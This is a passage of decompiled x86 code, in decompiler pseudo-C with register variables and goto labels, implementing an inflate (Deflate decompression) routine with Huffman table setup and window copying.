                                                                                                                          						 *__esi = 0xc;
                                                                                                                          						while(1) {
                                                                                                                          							L60:
                                                                                                                          							__esi[1] = __esi[1] >> 0xa;
                                                                                                                          							__eax = (__esi[1] >> 0xa) + 4;
                                                                                                                          							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                                                          								goto L68;
                                                                                                                          							}
                                                                                                                          							L61:
                                                                                                                          							while(1) {
                                                                                                                          								L64:
                                                                                                                          								if(__ebx >= 3) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								L62:
                                                                                                                          								if( *(__ebp - 0x34) == 0) {
                                                                                                                          									goto L182;
                                                                                                                          								}
                                                                                                                          								L63:
                                                                                                                          								__eax =  *(__ebp - 0x38);
                                                                                                                          								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                          								__ecx = __ebx;
                                                                                                                          								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                          								__ebx = __ebx + 8;
                                                                                                                          							}
                                                                                                                          							L65:
                                                                                                                          							__ecx = __esi[2];
                                                                                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                          							__ebx = __ebx - 3;
                                                                                                                          							_t108 = __ecx + 0x408408; // 0x121110
                                                                                                                          							__ecx =  *_t108;
                                                                                                                          							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                                                          							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                                                          							__ecx = __esi[1];
                                                                                                                          							__esi[2] = __esi[2] + 1;
                                                                                                                          							__eax = __esi[2];
                                                                                                                          							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                                                          							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                                                          								goto L64;
                                                                                                                          							}
                                                                                                                          							L66:
                                                                                                                          							while(1) {
                                                                                                                          								L68:
                                                                                                                          								if(__esi[2] >= 0x13) {
                                                                                                                          									break;
                                                                                                                          								}
                                                                                                                          								L67:
                                                                                                                          								_t119 = __esi[2] + 0x408408; // 0x4000300
                                                                                                                          								__eax =  *_t119;
                                                                                                                          								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                                                          								_t126 =  &(__esi[2]);
                                                                                                                          								 *_t126 = __esi[2] + 1;
                                                                                                                          							}
                                                                                                                          							L69:
                                                                                                                          							__ecx = __ebp - 8;
                                                                                                                          							__edi =  &(__esi[0x143]);
                                                                                                                          							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                                                          							__eax = 0;
                                                                                                                          							 *(__ebp - 8) = 0;
                                                                                                                          							__eax =  &(__esi[3]);
                                                                                                                          							 *__edi = 7;
                                                                                                                          							__eax = E00407272( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                                                          							if(__eax != 0) {
                                                                                                                          								L72:
                                                                                                                          								 *__esi = 0x11;
                                                                                                                          								while(1) {
                                                                                                                          									L180:
                                                                                                                          									_t396 =  *_t446;
                                                                                                                          									if(_t396 > 0xf) {
                                                                                                                          										break;
                                                                                                                          									}
                                                                                                                          									L1:
                                                                                                                          									switch( *((intOrPtr*)(_t396 * 4 +  &M004071CA))) {
                                                                                                                          										case 0:
                                                                                                                          											L101:
                                                                                                                          											__eax = __esi[4] & 0x000000ff;
                                                                                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                          											__eax = __esi[5];
                                                                                                                          											__esi[2] = __esi[5];
                                                                                                                          											 *__esi = 1;
                                                                                                                          											goto L102;
                                                                                                                          										case 1:
                                                                                                                          											L102:
                                                                                                                          											__eax = __esi[3];
                                                                                                                          											while(1) {
                                                                                                                          												L105:
                                                                                                                          												__eflags = __ebx - __eax;
                                                                                                                          												if(__ebx >= __eax) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												L103:
                                                                                                                          												__eflags =  *(__ebp - 0x34);
                                                                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                                                                          													goto L182;
                                                                                                                          												}
                                                                                                                          												L104:
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                          												__ecx = __ebx;
                                                                                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                          												__ebx = __ebx + 8;
                                                                                                                          												__eflags = __ebx;
                                                                                                                          											}
                                                                                                                          											L106:
                                                                                                                          											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                          											__ecx = __esi[2];
                                                                                                                          											__eax = __esi[2] + __eax * 4;
                                                                                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                          											__ecx =  *__eax & 0x000000ff;
                                                                                                                          											__eflags = __ecx;
                                                                                                                          											if(__ecx != 0) {
                                                                                                                          												L108:
                                                                                                                          												__eflags = __cl & 0x00000010;
                                                                                                                          												if((__cl & 0x00000010) == 0) {
                                                                                                                          													L110:
                                                                                                                          													__eflags = __cl & 0x00000040;
                                                                                                                          													if((__cl & 0x00000040) == 0) {
                                                                                                                          														goto L125;
                                                                                                                          													}
                                                                                                                          													L111:
                                                                                                                          													__eflags = __cl & 0x00000020;
                                                                                                                          													if((__cl & 0x00000020) == 0) {
                                                                                                                          														goto L9;
                                                                                                                          													}
                                                                                                                          													L112:
                                                                                                                          													 *__esi = 7;
                                                                                                                          													goto L180;
                                                                                                                          												}
                                                                                                                          												L109:
                                                                                                                          												__esi[2] = __ecx;
                                                                                                                          												__esi[1] = __eax;
                                                                                                                          												 *__esi = 2;
                                                                                                                          												goto L180;
                                                                                                                          											}
                                                                                                                          											L107:
                                                                                                                          											__esi[2] = __eax;
                                                                                                                          											 *__esi = 6;
                                                                                                                          											goto L180;
                                                                                                                          										case 2:
                                                                                                                          											L113:
                                                                                                                          											__eax = __esi[2];
                                                                                                                          											while(1) {
                                                                                                                          												L116:
                                                                                                                          												__eflags = __ebx - __eax;
                                                                                                                          												if(__ebx >= __eax) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												L114:
                                                                                                                          												__eflags =  *(__ebp - 0x34);
                                                                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                                                                          													goto L182;
                                                                                                                          												}
                                                                                                                          												L115:
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                          												__ecx = __ebx;
                                                                                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                          												__ebx = __ebx + 8;
                                                                                                                          												__eflags = __ebx;
                                                                                                                          											}
                                                                                                                          											L117:
                                                                                                                          											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                          											__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                          											__ecx = __eax;
                                                                                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                          											__ebx = __ebx - __eax;
                                                                                                                          											__eflags = __ebx;
                                                                                                                          											__eax = __esi[4] & 0x000000ff;
                                                                                                                          											__esi[3] = __esi[4] & 0x000000ff;
                                                                                                                          											__eax = __esi[6];
                                                                                                                          											__esi[2] = __esi[6];
                                                                                                                          											 *__esi = 3;
                                                                                                                          											goto L118;
                                                                                                                          										case 3:
                                                                                                                          											L118:
                                                                                                                          											__eax = __esi[3];
                                                                                                                          											while(1) {
                                                                                                                          												L121:
                                                                                                                          												__eflags = __ebx - __eax;
                                                                                                                          												if(__ebx >= __eax) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												L119:
                                                                                                                          												__eflags =  *(__ebp - 0x34);
                                                                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                                                                          													goto L182;
                                                                                                                          												}
                                                                                                                          												L120:
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                          												__ecx = __ebx;
                                                                                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                          												__ebx = __ebx + 8;
                                                                                                                          												__eflags = __ebx;
                                                                                                                          											}
                                                                                                                          											L122:
                                                                                                                          											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
                                                                                                                          											__eax = __eax &  *(__ebp - 0x40);
                                                                                                                          											__ecx = __esi[2];
                                                                                                                          											__eax = __esi[2] + __eax * 4;
                                                                                                                          											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                          											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                                                          											__ecx =  *__eax & 0x000000ff;
                                                                                                                          											__eflags = __cl & 0x00000010;
                                                                                                                          											if((__cl & 0x00000010) == 0) {
                                                                                                                          												L124:
                                                                                                                          												__eflags = __cl & 0x00000040;
                                                                                                                          												if((__cl & 0x00000040) != 0) {
                                                                                                                          													goto L9;
                                                                                                                          												}
                                                                                                                          												L125:
                                                                                                                          												__esi[3] = __ecx;
                                                                                                                          												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                                                                                          												__esi[2] = __eax;
                                                                                                                          												goto L180;
                                                                                                                          											}
                                                                                                                          											L123:
                                                                                                                          											__esi[2] = __ecx;
                                                                                                                          											__esi[3] = __eax;
                                                                                                                          											 *__esi = 4;
                                                                                                                          											goto L180;
                                                                                                                          										case 4:
                                                                                                                          											L126:
                                                                                                                          											__eax = __esi[2];
                                                                                                                          											while(1) {
                                                                                                                          												L129:
                                                                                                                          												__eflags = __ebx - __eax;
                                                                                                                          												if(__ebx >= __eax) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												L127:
                                                                                                                          												__eflags =  *(__ebp - 0x34);
                                                                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                                                                          													goto L182;
                                                                                                                          												}
                                                                                                                          												L128:
                                                                                                                          												__ecx =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                          												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                                                          												__ecx = __ebx;
                                                                                                                          												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                          												__ebx = __ebx + 8;
                                                                                                                          												__eflags = __ebx;
                                                                                                                          											}
                                                                                                                          											L130:
                                                                                                                          											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                                                          											__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                          											__ecx = __eax;
                                                                                                                          											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                          											__ebx = __ebx - __eax;
                                                                                                                          											__eflags = __ebx;
                                                                                                                          											 *__esi = 5;
                                                                                                                          											goto L131;
                                                                                                                          										case 5:
                                                                                                                          											L131:
                                                                                                                          											__eax =  *(__ebp - 0x30);
                                                                                                                          											__edx = __esi[3];
                                                                                                                          											__eax = __eax - __esi;
                                                                                                                          											__ecx = __eax - __esi - 0x1ba0;
                                                                                                                          											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                                                                                          											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                                                                                          												__ecx = __eax;
                                                                                                                          												__ecx = __eax - __edx;
                                                                                                                          												__eflags = __ecx;
                                                                                                                          											} else {
                                                                                                                          												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                                                                                          												__ecx = __esi[0x26e8] - __edx - __esi;
                                                                                                                          												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                                                                                          											}
                                                                                                                          											__eflags = __esi[1];
                                                                                                                          											 *(__ebp - 0x20) = __ecx;
                                                                                                                          											if(__esi[1] != 0) {
                                                                                                                          												L135:
                                                                                                                          												__edi =  *(__ebp - 0x2c);
                                                                                                                          												do {
                                                                                                                          													L136:
                                                                                                                          													__eflags = __edi;
                                                                                                                          													if(__edi != 0) {
                                                                                                                          														goto L152;
                                                                                                                          													}
                                                                                                                          													L137:
                                                                                                                          													__edi = __esi[0x26e8];
                                                                                                                          													__eflags = __eax - __edi;
                                                                                                                          													if(__eax != __edi) {
                                                                                                                          														L143:
                                                                                                                          														__esi[0x26ea] = __eax;
                                                                                                                          														__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                                                          														__eax = __esi[0x26ea];
                                                                                                                          														__ecx = __esi[0x26e9];
                                                                                                                          														__eflags = __eax - __ecx;
                                                                                                                          														 *(__ebp - 0x30) = __eax;
                                                                                                                          														if(__eax >= __ecx) {
                                                                                                                          															__edi = __esi[0x26e8];
                                                                                                                          															__edi = __esi[0x26e8] - __eax;
                                                                                                                          															__eflags = __edi;
                                                                                                                          														} else {
                                                                                                                          															__ecx = __ecx - __eax;
                                                                                                                          															__edi = __ecx - __eax - 1;
                                                                                                                          														}
                                                                                                                          														__edx = __esi[0x26e8];
                                                                                                                          														__eflags = __eax - __edx;
                                                                                                                          														 *(__ebp - 8) = __edx;
                                                                                                                          														if(__eax == __edx) {
                                                                                                                          															__edx =  &(__esi[0x6e8]);
                                                                                                                          															__eflags = __ecx - __edx;
                                                                                                                          															if(__ecx != __edx) {
                                                                                                                          																__eax = __edx;
                                                                                                                          																__eflags = __eax - __ecx;
                                                                                                                          																 *(__ebp - 0x30) = __eax;
                                                                                                                          																if(__eax >= __ecx) {
                                                                                                                          																	__edi =  *(__ebp - 8);
                                                                                                                          																	__edi =  *(__ebp - 8) - __eax;
                                                                                                                          																	__eflags = __edi;
                                                                                                                          																} else {
                                                                                                                          																	__ecx = __ecx - __eax;
                                                                                                                          																	__edi = __ecx;
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          														__eflags = __edi;
                                                                                                                          														if(__edi == 0) {
                                                                                                                          															goto L183;
                                                                                                                          														} else {
                                                                                                                          															goto L152;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          													L138:
                                                                                                                          													__ecx = __esi[0x26e9];
                                                                                                                          													__edx =  &(__esi[0x6e8]);
                                                                                                                          													__eflags = __ecx - __edx;
                                                                                                                          													if(__ecx == __edx) {
                                                                                                                          														goto L143;
                                                                                                                          													}
                                                                                                                          													L139:
                                                                                                                          													__eax = __edx;
                                                                                                                          													__eflags = __eax - __ecx;
                                                                                                                          													if(__eax >= __ecx) {
                                                                                                                          														__edi = __edi - __eax;
                                                                                                                          														__eflags = __edi;
                                                                                                                          													} else {
                                                                                                                          														__ecx = __ecx - __eax;
                                                                                                                          														__edi = __ecx;
                                                                                                                          													}
                                                                                                                          													__eflags = __edi;
                                                                                                                          													if(__edi == 0) {
                                                                                                                          														goto L143;
                                                                                                                          													}
                                                                                                                          													L152:
                                                                                                                          													__ecx =  *(__ebp - 0x20);
                                                                                                                          													 *__eax =  *__ecx;
                                                                                                                          													__eax = __eax + 1;
                                                                                                                          													__ecx = __ecx + 1;
                                                                                                                          													__edi = __edi - 1;
                                                                                                                          													__eflags = __ecx - __esi[0x26e8];
                                                                                                                          													 *(__ebp - 0x30) = __eax;
                                                                                                                          													 *(__ebp - 0x20) = __ecx;
                                                                                                                          													 *(__ebp - 0x2c) = __edi;
                                                                                                                          													if(__ecx == __esi[0x26e8]) {
                                                                                                                          														__ecx =  &(__esi[0x6e8]);
                                                                                                                          														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                                                                                          													}
                                                                                                                          													_t357 =  &(__esi[1]);
                                                                                                                          													 *_t357 = __esi[1] - 1;
                                                                                                                          													__eflags =  *_t357;
                                                                                                                          												} while ( *_t357 != 0);
                                                                                                                          											}
                                                                                                                          											goto L23;
                                                                                                                          										case 6:
                                                                                                                          											L156:
                                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                                          											__edi =  *(__ebp - 0x30);
                                                                                                                          											__eflags = __eax;
                                                                                                                          											if(__eax != 0) {
                                                                                                                          												L172:
                                                                                                                          												__cl = __esi[2];
                                                                                                                          												 *__edi = __cl;
                                                                                                                          												__edi = __edi + 1;
                                                                                                                          												__eax = __eax - 1;
                                                                                                                          												 *(__ebp - 0x30) = __edi;
                                                                                                                          												 *(__ebp - 0x2c) = __eax;
                                                                                                                          												goto L23;
                                                                                                                          											}
                                                                                                                          											L157:
                                                                                                                          											__ecx = __esi[0x26e8];
                                                                                                                          											__eflags = __edi - __ecx;
                                                                                                                          											if(__edi != __ecx) {
                                                                                                                          												L163:
                                                                                                                          												__esi[0x26ea] = __edi;
                                                                                                                          												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                                                          												__edi = __esi[0x26ea];
                                                                                                                          												__ecx = __esi[0x26e9];
                                                                                                                          												__eflags = __edi - __ecx;
                                                                                                                          												 *(__ebp - 0x30) = __edi;
                                                                                                                          												if(__edi >= __ecx) {
                                                                                                                          													__eax = __esi[0x26e8];
                                                                                                                          													__eax = __esi[0x26e8] - __edi;
                                                                                                                          													__eflags = __eax;
                                                                                                                          												} else {
                                                                                                                          													__ecx = __ecx - __edi;
                                                                                                                          													__eax = __ecx - __edi - 1;
                                                                                                                          												}
                                                                                                                          												__edx = __esi[0x26e8];
                                                                                                                          												__eflags = __edi - __edx;
                                                                                                                          												 *(__ebp - 8) = __edx;
                                                                                                                          												if(__edi == __edx) {
                                                                                                                          													__edx =  &(__esi[0x6e8]);
                                                                                                                          													__eflags = __ecx - __edx;
                                                                                                                          													if(__ecx != __edx) {
                                                                                                                          														__edi = __edx;
                                                                                                                          														__eflags = __edi - __ecx;
                                                                                                                          														 *(__ebp - 0x30) = __edi;
                                                                                                                          														if(__edi >= __ecx) {
                                                                                                                          															__eax =  *(__ebp - 8);
                                                                                                                          															__eax =  *(__ebp - 8) - __edi;
                                                                                                                          															__eflags = __eax;
                                                                                                                          														} else {
                                                                                                                          															__ecx = __ecx - __edi;
                                                                                                                          															__eax = __ecx;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												__eflags = __eax;
                                                                                                                          												if(__eax == 0) {
                                                                                                                          													goto L183;
                                                                                                                          												} else {
                                                                                                                          													goto L172;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L158:
                                                                                                                          											__eax = __esi[0x26e9];
                                                                                                                          											__edx =  &(__esi[0x6e8]);
                                                                                                                          											__eflags = __eax - __edx;
                                                                                                                          											if(__eax == __edx) {
                                                                                                                          												goto L163;
                                                                                                                          											}
                                                                                                                          											L159:
                                                                                                                          											__edi = __edx;
                                                                                                                          											__eflags = __edi - __eax;
                                                                                                                          											if(__edi >= __eax) {
                                                                                                                          												__ecx = __ecx - __edi;
                                                                                                                          												__eflags = __ecx;
                                                                                                                          												__eax = __ecx;
                                                                                                                          											} else {
                                                                                                                          												__eax = __eax - __edi;
                                                                                                                          												__eax = __eax - 1;
                                                                                                                          											}
                                                                                                                          											__eflags = __eax;
                                                                                                                          											if(__eax != 0) {
                                                                                                                          												goto L172;
                                                                                                                          											} else {
                                                                                                                          												goto L163;
                                                                                                                          											}
                                                                                                                          										case 7:
                                                                                                                          											L173:
                                                                                                                          											__eflags = __ebx - 7;
                                                                                                                          											if(__ebx > 7) {
                                                                                                                          												__ebx = __ebx - 8;
                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                                                          												_t380 = __ebp - 0x38;
                                                                                                                          												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                                                          												__eflags =  *_t380;
                                                                                                                          											}
                                                                                                                          											goto L175;
                                                                                                                          										case 8:
                                                                                                                          											L4:
                                                                                                                          											while(_t425 < 3) {
                                                                                                                          												if( *(_t448 - 0x34) == 0) {
                                                                                                                          													goto L182;
                                                                                                                          												} else {
                                                                                                                          													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                                                          													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                                                          													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                                                          													_t425 = _t425 + 8;
                                                                                                                          													continue;
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											_t425 = _t425 - 3;
                                                                                                                          											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                                                          											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                                                          											asm("sbb ecx, ecx");
                                                                                                                          											_t408 = _t406 >> 1;
                                                                                                                          											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                                                          											if(_t408 == 0) {
                                                                                                                          												L24:
                                                                                                                          												 *_t446 = 9;
                                                                                                                          												_t436 = _t425 & 0x00000007;
                                                                                                                          												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                                                          												_t425 = _t425 - _t436;
                                                                                                                          												goto L180;
                                                                                                                          											}
                                                                                                                          											L6:
                                                                                                                          											_t411 = _t408 - 1;
                                                                                                                          											if(_t411 == 0) {
                                                                                                                          												L13:
                                                                                                                          												__eflags =  *0x42e3d0;
                                                                                                                          												if( *0x42e3d0 != 0) {
                                                                                                                          													L22:
                                                                                                                          													_t412 =  *0x40a444; // 0x9
                                                                                                                          													_t446[4] = _t412;
                                                                                                                          													_t413 =  *0x40a448; // 0x5
                                                                                                                          													_t446[4] = _t413;
                                                                                                                          													_t414 =  *0x42d24c; // 0x0
                                                                                                                          													_t446[5] = _t414;
                                                                                                                          													_t415 =  *0x42d248; // 0x0
                                                                                                                          													_t446[6] = _t415;
                                                                                                                          													L23:
                                                                                                                          													 *_t446 =  *_t446 & 0x00000000;
                                                                                                                          													goto L180;
                                                                                                                          												} else {
                                                                                                                          													_t26 = _t448 - 8;
                                                                                                                          													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                                                          													__eflags =  *_t26;
                                                                                                                          													_t416 = 0x42d250;
                                                                                                                          													goto L15;
                                                                                                                          													L20:
                                                                                                                          													 *_t416 = _t438;
                                                                                                                          													_t416 = _t416 + 4;
                                                                                                                          													__eflags = _t416 - 0x42d6d0;
                                                                                                                          													if(_t416 < 0x42d6d0) {
                                                                                                                          														L15:
                                                                                                                          														__eflags = _t416 - 0x42d48c;
                                                                                                                          														_t438 = 8;
                                                                                                                          														if(_t416 > 0x42d48c) {
                                                                                                                          															__eflags = _t416 - 0x42d650;
                                                                                                                          															if(_t416 >= 0x42d650) {
                                                                                                                          																__eflags = _t416 - 0x42d6b0;
                                                                                                                          																if(_t416 < 0x42d6b0) {
                                                                                                                          																	_t438 = 7;
                                                                                                                          																}
                                                                                                                          															} else {
                                                                                                                          																_t438 = 9;
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          														goto L20;
                                                                                                                          													} else {
                                                                                                                          														E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t448 - 8);
                                                                                                                          														_push(0x1e);
                                                                                                                          														_pop(_t440);
                                                                                                                          														_push(5);
                                                                                                                          														_pop(_t419);
                                                                                                                          														memset(0x42d250, _t419, _t440 << 2);
                                                                                                                          														_t450 = _t450 + 0xc;
                                                                                                                          														_t442 = 0x42d250 + _t440;
                                                                                                                          														E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t448 - 8);
                                                                                                                          														 *0x42e3d0 =  *0x42e3d0 + 1;
                                                                                                                          														__eflags =  *0x42e3d0;
                                                                                                                          														goto L22;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          											L7:
                                                                                                                          											_t423 = _t411 - 1;
                                                                                                                          											if(_t423 == 0) {
                                                                                                                          												 *_t446 = 0xb;
                                                                                                                          												goto L180;
                                                                                                                          											}
                                                                                                                          											L8:
                                                                                                                          											if(_t423 != 1) {
                                                                                                                          												goto L180;
                                                                                                                          											}
                                                                                                                          											goto L9;
                                                                                                                          										case 9:
                                                                                                                          											while(1) {
                                                                                                                          												L27:
                                                                                                                          												__eflags = __ebx - 0x20;
                                                                                                                          												if(__ebx >= 0x20) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												L25:
                                                                                                                          												__eflags =  *(__ebp - 0x34);
                                                                                                                          												if( *(__ebp - 0x34) == 0) {
                                                                                                                          													goto L182;
                                                                                                                          												}
                                                                                                                          												L26:
                                                                                                                          												__eax =  *(__ebp - 0x38);
                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                                                          												__ecx = __ebx;
                                                                                                                          												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                                                          												__ebx = __ebx + 8;
                                                                                                                          												__eflags = __ebx;
                                                                                                                          											}
                                                                                                                          											L28:
                                                                                                                          											__eax =  *(__ebp - 0x40);
                                                                                                                          											__ebx = 0;
                                                                                                                          											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                                                          											 *(__ebp - 0x40) = 0;
                                                                                                                          											__eflags = __eax;
                                                                                                                          											__esi[1] = __eax;
                                                                                                                          											if(__eax == 0) {
                                                                                                                          												goto L53;
                                                                                                                          											}
                                                                                                                          											L29:
                                                                                                                          											_push(0xa);
                                                                                                                          											_pop(__eax);
                                                                                                                          											goto L54;
                                                                                                                          										case 0xa:
                                                                                                                          											L30:
                                                                                                                          											__eflags =  *(__ebp - 0x34);
                                                                                                                          											if( *(__ebp - 0x34) == 0) {
                                                                                                                          												goto L182;
                                                                                                                          											}
                                                                                                                          											L31:
                                                                                                                          											__eax =  *(__ebp - 0x2c);
                                                                                                                          											__eflags = __eax;
                                                                                                                          											if(__eax != 0) {
                                                                                                                          												L48:
                                                                                                                          												__eflags = __eax -  *(__ebp - 0x34);
                                                                                                                          												if(__eax >=  *(__ebp - 0x34)) {
                                                                                                                          													__eax =  *(__ebp - 0x34);
                                                                                                                          												}
                                                                                                                          												__ecx = __esi[1];
                                                                                                                          												__eflags = __ecx - __eax;
                                                                                                                          												__edi = __ecx;
                                                                                                                          												if(__ecx >= __eax) {
                                                                                                                          													__edi = __eax;
                                                                                                                          												}
                                                                                                                          												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                                                          												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                                                          												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                                                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                                                          												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                                                          												_t80 =  &(__esi[1]);
                                                                                                                          												 *_t80 = __esi[1] - __edi;
                                                                                                                          												__eflags =  *_t80;
                                                                                                                          												if( *_t80 == 0) {
                                                                                                                          													L53:
                                                                                                                          													__eax = __esi[0x145];
                                                                                                                          													L54:
                                                                                                                          													 *__esi = __eax;
                                                                                                                          												}
                                                                                                                          												goto L180;
                                                                                                                          											}
                                                                                                                          											L32:
                                                                                                                          											__ecx = __esi[0x26e8];
                                                                                                                          											__edx =  *(__ebp - 0x30);
                                                                                                                          											__eflags = __edx - __ecx;
                                                                                                                          											if(__edx != __ecx) {
                                                                                                                          												L38:
                                                                                                                          												__esi[0x26ea] = __edx;
                                                                                                                          												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
                                                                                                                          												__edx = __esi[0x26ea];
                                                                                                                          												__ecx = __esi[0x26e9];
                                                                                                                          												__eflags = __edx - __ecx;
                                                                                                                          												 *(__ebp - 0x30) = __edx;
